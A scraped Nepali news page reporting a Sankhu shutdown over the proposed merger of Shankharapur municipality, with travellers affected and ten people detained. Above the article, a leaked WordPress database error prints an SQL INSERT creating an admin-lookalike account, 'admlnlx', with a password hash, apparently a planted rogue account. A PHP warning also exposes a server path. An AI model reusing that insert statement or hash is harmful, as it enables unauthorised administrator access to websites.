WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1If/.U1WAXI9GDAXLHKOH3zsymSD/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 13:41:38', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
साँखु बन्दका कारण यात्रु मर्कामा – Gaule Khabar

साँखु बन्दका कारण यात्रु मर्कामा

साँखु बन्दका कारण यात्रु मर्कामा

काठमाडौँ, माघ २६ –

शङ्करापुर नगरपालिकालाई कायम राख्न माग गर्दै आज बिहान ५ देखि १० बजेसम्म गरिएको साँखु बन्दका कारण यात्रु मर्कामा परेका छन् ।

स्थानीय तह पुनःसंरचना आयोगले सरकारलाई पेस गरेको प्रतिवेदनमा शङ्खरापुर नगरपालिकालाई कागेश्वरी मनोहरा नगरपालिकामा गाभेको भन्दै आज साँखु बन्द गरिएका कारण शाली नदी आउनेजाने तीर्थयात्रु मर्कामा परेका हुन् ।

ऐतिहासिक, सांस्कृतिक र पौराणिक हिसाबले महत्वपूर्ण शङ्खरापुर नगरपालिकाको अस्तित्व मेटाउन खोजिएको भन्दै शङ्खरापुर भएर चल्ने सवारी साधन पसल सबै बन्द गरिएको स्थानीयवासी पवनलाल श्रेष्ठले राससलाई जानकारी दिनुभयो ।

बन्दले सिन्धुपाल्चोकको मेलम्ची चल्ने सवारी साधन आगमनमा समेत समस्या परेको थियो । बन्द गराउँदै हिँडेका १० जनालाई प्रहरीले नियन्त्रणमा लिएको छ ।

आयोगले सरकारलाई प्रतिवेदन बुझाएको भोलिपल्टै यस क्षेत्रबाट प्रत्यक्ष निर्वाचित सांसद दीपकप्रसाद कुइँकेलको संयोजकत्वमा सबै दलका प्रतिनिधि सदस्य रहेको शङ्खरापुर नगरपालिका बचाऊ सङ्घर्ष समिति गठन गरिएको थियो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका